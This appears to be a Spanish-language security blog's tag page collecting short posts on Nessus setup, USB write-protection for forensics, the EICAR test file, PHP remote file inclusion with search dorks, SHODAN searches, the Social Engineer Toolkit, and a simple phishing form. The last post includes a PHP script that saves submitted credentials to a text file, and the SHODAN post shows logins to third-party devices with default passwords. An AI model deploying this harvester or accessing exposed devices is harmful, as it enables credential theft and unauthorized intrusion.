Posts Tagged ‘ security information ’

Usar/configurar Nessus en Backtrack5

Nessus on Backtrack5

Por defecto Nessus ya viene instalado en BAcktrack 5, para poder hacer uso de este útil escáner de vulnerabilidades en BT5, se deben seguir los siguentes pasos:

  • Conseguir la clave o el código de activación, registrandose en el sitio WEb de Teneable/Nessus, en este enlace.

Luego de ingresar los datos y registrarse, una clave es enviada al correo.

  • Ingresar la clave/código de activación

Esto lo podemos realizar mediante el siguiente comando:

#/opt/nessus/bin/nessus-fetch –register xxxx-xxxx-xxxx-xxxx, donde se reemplaza las X por el código que nos fue asignado

  • Crear un nuevo usuario, con su respectiva contraseña:

A traves del siguiente comando:

#/opt/nessus/sbin/nessus-adduser

  • Iniciar el servicio:

# /etc/init.d/nessusd start

Es too…

Saludos

Anuncios

Análisis Forense Digital, preservando la evidencia – Protegiendo USB

En un proceso de Análisis Forense Digital, una vez que se ha procedido con el secuestro de la evidencia es necesario mantenerla intacta tal cual se ha obtenido, para poder preservar su integridad. Es así que, si se va a realizar un análisis de un dispositivo (una USB por ejemplo), es importante que la información contenida no sea modificada ni que se modifiquen, creen, borren, copien, etc datos de la misma; por ello, debemos proteger la USB de ESCRITURA y dejarla de solo LECTURA.

Para lograr esto, procedemos de la siguiente manera, en un equipo Windows:

Añadir al registro la siguiente key:

\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control

– Aquí, añadir nueva DWORD de 32 bits con el nombre “StorageDevicePolicies”, sin comillas.

– Dentro de esta, crear una nueva key, y la llamaremos “WriteProtect”, sin comillas y la seteamos en 1

Para comprobar esto, he intentado copiar un archivo llamado test.txt a la USB protegida y esta es la ventana de error que me sale:

USB write-protect

USB write-protect

Ahora, si montamos las USB en el equipo y podemos comprobar, al tratar de crear, copiar, cortar, borrar, modificar algún archivo, etc, nos va a mostrar un mensaje de que no esta permitido realizar tal operación.

Como verificar si tu antivirus realmente te protege…

En 1996, el EICAR, European Institute for Computer Antivirus Research (en español Instituto Europeo para la Investigación de los Antivirus Informáticos), desarrolló lo que hoy es conocido como EICAR test file, o archivo de prueba EICAR.

Se trata de un test o prueba mediante la cual se pretende verificar la funcionalidad de tu antivirus y verificar que realmente está protegiendo tu equipo. Vale aclarar tambien que este test no implica ningún riesgo para la seguridad de tu computadora, simplemente se trata de una prueba.

El EICAR test file consiste en 68 caracteres ASCII (70 si lo generamos con un editor de texto, debido a los códigos de retorno y final de línea que suelen insertar los editores).

Los caracteres son:

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Todas las letras están en mayúsculas, y sin espacios. El tercer carácter (X5O…) es la letra “O” no el número cero).

Para crear un archivo de prueba, copie y pegue la línea anterior al bloc de notas, y grabe su contenido con el nombre que quiera y la extensión .COM

eicar_test

eicar_test

Si el antivirus que tienes instalado trabaja correctamente, deberá lanzar un mensaje de error al momento de ejecutar este archivo.

eicar_test

eicar_test

Es necesario mencionar que actualmente existen virus reales que simulan ser el EICAR, por lo tanto tener mucho cuidado.

Fuentes:

http://www.vsantivirus.com/eicar-test.htm

RFI Remote File Inclusion en páginas php

RFI se trata de una vulnerabilidad de las páginas web programadas en php, debido al mal manejo de la funcion/etiqueta include, a traves de esta vulnerabilidad se puede enlazar archivos (páginas, formularios, etc)  alojadas en servidores remotos.

Para ser más explicativo, se propone un ejemplo. Tenemos nuestra página web llamada pagina y desde está nos permite enlazarnos a otra página a traves de la función include()

http://www.pagina.com/index.php?page=otrapagina.php

A través de la variable page, estamos incluyendo una nueva página, en este caso otrapagina.php

Como localizar página vulnerables RFI?

Una de las formas más fáciles para realizar esta tarea es mediante la utilización de dorks (utilización de operadores avanzados) en motores de búsqueda, tales como Google, Bing, Yahoo, etc.

En el caso sencillo que he utilizado es simplemente: “.php?page=http://”, y bueno, algunos resultados son:

Page vulnerable RFI
Page vulnerable RFI

otra:

Page vulnerable RFI

Page vulnerable RFI

y una mas:

Page vulnerable RFI

Page vulnerable RFI

Los riesgos

Si bien a simple vista parecería que esta vulnerabilidad no conlleva grandes riesgos, pues a través de RFI, se pueden enlazar formularios y enviarles la url completa a los usuarios de la página pidiendoles que actulicen sus datos, esto un ejemplo.

Otro es el que mediante esta vulnerabilidad es la inclusión de shells que abran terminales o lineas de comando para poder descargar y subir archivos y apoderarse del servidor.

SHODAN y contraseñas por defecto, dispositivos “abiertos”…

SHODAN es un motor de búsqueda, pero no como los clásicos Google, Bing o Yahoo. Se trata de un buscador diseñado para ayudar a los usuarios a encontrar nodos específicos (desktops, servers, routers, switchs, APs, o dispositivos, etc) con contenido especifico en sus banners. Muy recomendable en trabajos de auditorías de seguridad, en la fase de reconocimiento….

Es por ello que, para optimizar las búsquedas con SHODAN, es necesario un conocimiento básico de banners, ya sea de aplicaciones, routers, swithcs, etc.

Su creador es el desarrollador Jonh Materly, su página oficial es: http://www.shodanhq.com/

Lo más interesante de esta herramienta es que permite búsquedas personalizadas, por ejemplo, se puede buscar por paises: country:EC, puertos: port:80, nombre de aplicación: apache/IIS, etc.

Ahora, podemos observar algunos resultados interesantes de este buscador:

– Dispositivos/cámaras abiertas, o con contraseñas por defecto/débiles

Camera D-Link

Camera D-Link

SkyIPCam

SkyIPCam

– Dispositivos de comunicación con usuarios/passwords por defecto o débiles, en lo que se ha podido ingresar:

– Router ADSL D-Link

Router ADSL D-Link

Router ADSL D-Link

– BM632 WiMAX

BM632 WiMAX
BM632 WiMAX – Login

Accesando a los dispositivos:

BM632 WiMAX

BM632 WiMAX - usuario/contraseña por defecto

La configuración del Nivel de in-Seguridad del Firewall. 😀

BM632 WiMAX

BM632 WiMAX - Configuración

Utilizando filtros adecuados, se puede obtener muy valiosa información. Lo mostrado es sólo una muestra de lo que éste buscador puede realizar.

Phishing + robo de contraseñas con SET (Social Engineer Toolkit)

SET (Social Engineer Toolkit), se trata de un kit de herramientas especialmente diseñado para realizar ataques avanzados contra el elemento humano. Este conjunto de herramientas rápidamente se ha constituido en una herramienta estandard en el arsenal de los penetration testers.

Fué escrito por David Kennedy (Rel1K). Los ataques construidos con este toolkit son diseñados para ser lanzado contra una persona u organización durante un test de penetración. Forma parte del kit de herramientas de Backtrack.

Configuración:

pentest/exploits/SET#nano config/set_config

Nos fijamos que estén configuradas, al menos, las siguientes opciones:

METASPLOIT_PATH=/opt/metasploit3/msf3
ETTERCAP=ON
ETTERCAP_INTERFACE=eth0
ETTERCAP_PATH=/usr/share/ettercap
WEBATTACK_EMAIL=ON
AUTO_DETECT=ON
SELF_SIGNED_APPLET=ON

Ahora, ejecutamos SET:

pentest/exploits/SET# ./set

Se presenta el siguiente menú:

Select from the menu:

1.  Spear-Phishing Attack Vectors
2.  Website Attack Vectors
3.  Infectious Media Generator
4.  Create a Payload and Listener
5.  Mass Mailer Attack
6.  Teensy USB HID Attack Vector
7.  SMS Spoofing Attack Vector
8.  Third Party Modules
9.  Update the Metasploit Framework
10. Update the Social-Engineer Toolkit
11. Help, Credits, and About
12. Exit the Social-Engineer Toolkit

Escojemos la opción: 2

Sigue leyendo

Formulario sencillo para Phishing…

El phishing, conocido ataque de la fase de Gathering Information, en el que se le presenta a un usuario una página falsa para que haga el ingreso de sus datos, y sin su conocimiento estos datos son transferidos/enviados al atacante.

En este post, se hace mención a este tipo de ataque de una forma básica. Y se plantea el siguiente escenario:

Una vez seleccionada la página objetivo/victima a “falsear”, se hace una copia exacta de la misma, pero la misma incluye un formulario en php que toma los datos ingresados y los almacena en un archivo .txt. Una vez realizado esto, subir la página a un servidor web local (dentro de la red), para que sea enviado a los usuarios dentro de la red.

Archivos necesarios:

Lo que necesitamos por ahora es el código php que será el encargado de leer los datos ingresados y enviarlos a un .txt. Abrimos cualquier editor de texto y pegamos el siguiente código y le damos cualquier nombre, por ejemplo validar.php

<?php
$fichero = “infousers.txt”;
$handle = fopen($fichero, “a+”);
foreach($_POST as $user => $pass)
{
fwrite($handle, $user);
fwrite($handle, “=”);
fwrite($handle, $vpass);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);

header(“Location: http://www.google.com&#8221;);

exit;
?>

Básicamente, lo que hacemos en este código es:

Sigue leyendo